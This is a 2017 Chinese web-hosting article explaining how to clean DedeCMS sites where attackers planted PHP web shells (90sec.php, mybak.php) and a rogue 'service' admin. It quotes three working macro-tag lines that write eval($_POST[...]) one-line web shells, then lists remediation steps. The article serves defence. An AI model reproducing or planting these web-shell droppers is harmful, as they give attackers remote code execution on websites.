您当前的位置:首页 > 广州网站建设-CMS > Dedecms

织梦plus目录下被写入90sec.php,mybak.php文件的解决办法

时间:2017-11-26 09:56:35  来源:  作者:

http://www.soushaa.com/dedecms/dede_13485.html
 

织梦plus目录下被写入90sec.php,mybak.php文件的解决办法

织梦专业网站建设,为您打造精品网站-www.soushaa.com
最近有很多用织梦的朋友反馈说,自己的 织梦CMS 的plus目录下被写入了90sec.php,mybak.php等多个一句话木马文件。 经过搜网织梦建站的技术人员排查,发现 后台管理员增加一个名为 service 的用户,同时 后台被添加若干自定义宏标记, 具体 内容为: {dede:p

本页关键词:

织梦plus目录下被写入90sec.php,mybak.php文件的解决办法
最近有很多用织梦的朋友反馈说,自己的织梦CMS的plus目录下被写入了90sec.php,mybak.php等多个一句话木马文件。
经过搜网织梦建站的技术人员排查,发现后台管理员增加一个名为 service 的用户,同时后台被添加若干自定义宏标记,
具体
内容为:
{dede:php}file_put_contents('bakup.php','<?php eval($_POST[mb]);?>');{/dede:php}
{dede:php}file_put_contents('90sec.php','<?php eval($_POST[guige]);?>');{/dede:php}
{dede:php}file_put_contents('mybak.php','<?php eval($_POST[mybak]);?>');{/dede:php}
如下图所示:



织梦朋友可通过以下方式解决:
1.删除名为 service 的用户(如果没有这个用户则不必理会)
2.删除自定义宏标记的几个文件。
3.打上织梦最新的漏洞补丁。
4.建议删除plus目录下的
mytag_js.php文件。
 
来顶一下
返回首页
返回首页
发表评论
用户名: 密码:
验证码: 匿名发表
推荐资讯
相关文章
    无相关信息
栏目更新
栏目热门